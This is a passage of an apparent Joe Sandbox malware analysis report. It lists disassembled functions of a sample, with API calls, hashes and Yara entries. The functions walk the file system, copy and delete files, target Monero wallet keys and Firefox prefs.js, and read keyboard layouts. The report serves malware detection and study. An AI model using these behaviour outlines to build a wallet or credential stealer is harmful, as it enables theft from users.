                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: bb8d65720049f08d1ad90b1fdd0cb75eb51d9a0c640f60294e63b7fe39caaf1d
                                • Instruction ID: 6b0de390a4307585a74a6bb9fbefb63d54dd8abe6ac10f9d1dd31a2b4ea3367a
                                • Opcode Fuzzy Hash: bb8d65720049f08d1ad90b1fdd0cb75eb51d9a0c640f60294e63b7fe39caaf1d
                                • Instruction Fuzzy Hash: 9F6178B1500219BBDB20EBA0DC4AFEE777CBB48701F04859CB64996180EB75EB85CF95
                                Function 00504570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00504580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00504587
                                • wsprintfA.USER32 ref: 005045A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 005045BD
                                • StrCmpCA.SHLWAPI(?,00510FC4), ref: 005045EB
                                • StrCmpCA.SHLWAPI(?,00510FC8), ref: 00504601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0050468B
                                • FindClose.KERNEL32(000000FF), ref: 005046A0
                                • lstrcat.KERNEL32(?,012DE320), ref: 005046C5
                                • lstrcat.KERNEL32(?,012DD778), ref: 005046D8
                                • lstrlen.KERNEL32(?), ref: 005046E5
                                • lstrlen.KERNEL32(?), ref: 005046F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: a76e69ae162708172d456cbaa1bcc117625352ee0f62b5aa52de7a2cc5b2cb86
                                • Instruction ID: 4562a6b9e38c24f0da68734f845df47d0c83fcaa180f8a99f3f39394373d8b52
                                • Opcode Fuzzy Hash: a76e69ae162708172d456cbaa1bcc117625352ee0f62b5aa52de7a2cc5b2cb86
                                • Instruction Fuzzy Hash: 715167B1500218ABDB20EB70DC8AFEE777CBB58301F408588F64992190EB79DB85CF95
                                Function 00503EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00503EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00503EDA
                                • StrCmpCA.SHLWAPI(?,00510FAC), ref: 00503F08
                                • StrCmpCA.SHLWAPI(?,00510FB0), ref: 00503F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0050406C
                                • FindClose.KERNEL32(000000FF), ref: 00504081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: d4bc4824676e8357b42a18afb8254189f19271a53ec07198c5440c130a8f4ea0
                                • Instruction ID: 903e7103fa2bab7c10fcfe81752eaf087825e92b6e0b0351b05637dd5a0d1406
                                • Opcode Fuzzy Hash: d4bc4824676e8357b42a18afb8254189f19271a53ec07198c5440c130a8f4ea0
                                • Instruction Fuzzy Hash: E65146B1900219BBDB24FBB0DC8AEFE777CBB44301F408588B69996080DB75DB858F55
                                Function 004FED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 004FED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 004FED55
                                • StrCmpCA.SHLWAPI(?,00511538), ref: 004FEDAB
                                • StrCmpCA.SHLWAPI(?,0051153C), ref: 004FEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FF2AE
                                • FindClose.KERNEL32(000000FF), ref: 004FF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 381f5f73c9f24d0a9ba9565a22093008529cbb21302132b31fc67b80271315a2
                                • Instruction ID: aafc1441c63108a68d04bb386faacd5c25d59beb792e066932fdfca404eab2ca
                                • Opcode Fuzzy Hash: 381f5f73c9f24d0a9ba9565a22093008529cbb21302132b31fc67b80271315a2
                                • Instruction Fuzzy Hash: 60E112729112199AEB54FB60CC56EEE7738BF94300F4085D9B50A620D2EF346F8ACF56
                                Function 004FF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005115B8,00510D96), ref: 004FF71E
                                • StrCmpCA.SHLWAPI(?,005115BC), ref: 004FF76F
                                • StrCmpCA.SHLWAPI(?,005115C0), ref: 004FF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FFAB1
                                • FindClose.KERNEL32(000000FF), ref: 004FFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: df25f514ca1a8bf509a2ea51fc6a7fe55e8639862b2e8e7b65f21a7d514493b9
                                • Instruction ID: f25a41523823b3ffc0f37b196ba5096515f13794b339f92c80d8662bacf06f56
                                • Opcode Fuzzy Hash: df25f514ca1a8bf509a2ea51fc6a7fe55e8639862b2e8e7b65f21a7d514493b9
                                • Instruction Fuzzy Hash: 57B180719002099BDB24FF60DC9AFEE7779BF94300F0085A9A50A961C1EF346B49CF96
                                Function 004F16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0051510C,?,?,?,005151B4,?,?,00000000,?,00000000), ref: 004F1923
                                • StrCmpCA.SHLWAPI(?,0051525C), ref: 004F1973
                                • StrCmpCA.SHLWAPI(?,00515304), ref: 004F1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004F1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 004F1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004F1E20
                                • FindClose.KERNEL32(000000FF), ref: 004F1E32
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 53a8ac0ebf51ccffc92c75c2bbb3505e76ac06ef6c984eea13896f59c2944b6c
                                • Instruction ID: 8bc1e80bfa8c83d8970b91cfc391adb8e92069e2a62ed52f31e94807ecd98ce8
                                • Opcode Fuzzy Hash: 53a8ac0ebf51ccffc92c75c2bbb3505e76ac06ef6c984eea13896f59c2944b6c
                                • Instruction Fuzzy Hash: CF1222719102199BDB55FB60CC9AEEE7B78BF94300F408599B50A620D1EF346F89CF92
                                Function 004FDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00510C2E), ref: 004FDE5E
                                • StrCmpCA.SHLWAPI(?,005114C8), ref: 004FDEAE
                                • StrCmpCA.SHLWAPI(?,005114CC), ref: 004FDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FE3E0
                                • FindClose.KERNEL32(000000FF), ref: 004FE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 8a9c8e61f914a99f6dd56c9a3206277426b1c92d9e8f06000ac5e9c9978de176
                                • Instruction ID: 6a59c04a57c198ff129662c46e7ff885830b2a5f9cd9823f11beec4b501eae30
                                • Opcode Fuzzy Hash: 8a9c8e61f914a99f6dd56c9a3206277426b1c92d9e8f06000ac5e9c9978de176
                                • Instruction Fuzzy Hash: 05F1B1719102199ADB15FB60CC9AEEE7738BF94300F8085D9B50A620D1EF746F8ACF56
                                Function 004FDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005114B0,00510C2A), ref: 004FDAEB
                                • StrCmpCA.SHLWAPI(?,005114B4), ref: 004FDB33
                                • StrCmpCA.SHLWAPI(?,005114B8), ref: 004FDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FDDCC
                                • FindClose.KERNEL32(000000FF), ref: 004FDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: a1faf237f5c729a97964cc47a05438fc8e5a12235bd016b1fef3384e864afc72
                                • Instruction ID: 4bc52faa628488f5ead158d8e8bde2695461604e57deabaf2ea370117e8918e3
                                • Opcode Fuzzy Hash: a1faf237f5c729a97964cc47a05438fc8e5a12235bd016b1fef3384e864afc72
                                • Instruction Fuzzy Hash: 91916472900209A7DB14FB70DC9ADFD777DBFD4300F40C659B90696185EE38AB098B96
                                Function 008B566B Relevance: 12.9, Strings: 9, Instructions: 1608COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Dp6$3{N$4D;?$7s?o$N;?$\9_$]r6u$j#$zs
                                • API String ID: 0-2514805122
                                • Opcode ID: 96a34087d60d4d6e6a54565933b1fe230f5be2e441158eaef01ea288a016802e
                                • Instruction ID: 8c9ed64d594028ca59da0d524dd6a663393cb2ed7e10da2adcd139c524d84522
                                • Opcode Fuzzy Hash: 96a34087d60d4d6e6a54565933b1fe230f5be2e441158eaef01ea288a016802e
                                • Instruction Fuzzy Hash: DCB229F3A0C2149FE3146E2DEC4567ABBE9EFD4720F1A493DEAC4C3740E63598018696
                                Function 00507B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,005105AF), ref: 00507BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00507BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00507C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00507C62
                                • LocalFree.KERNEL32(00000000), ref: 00507D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
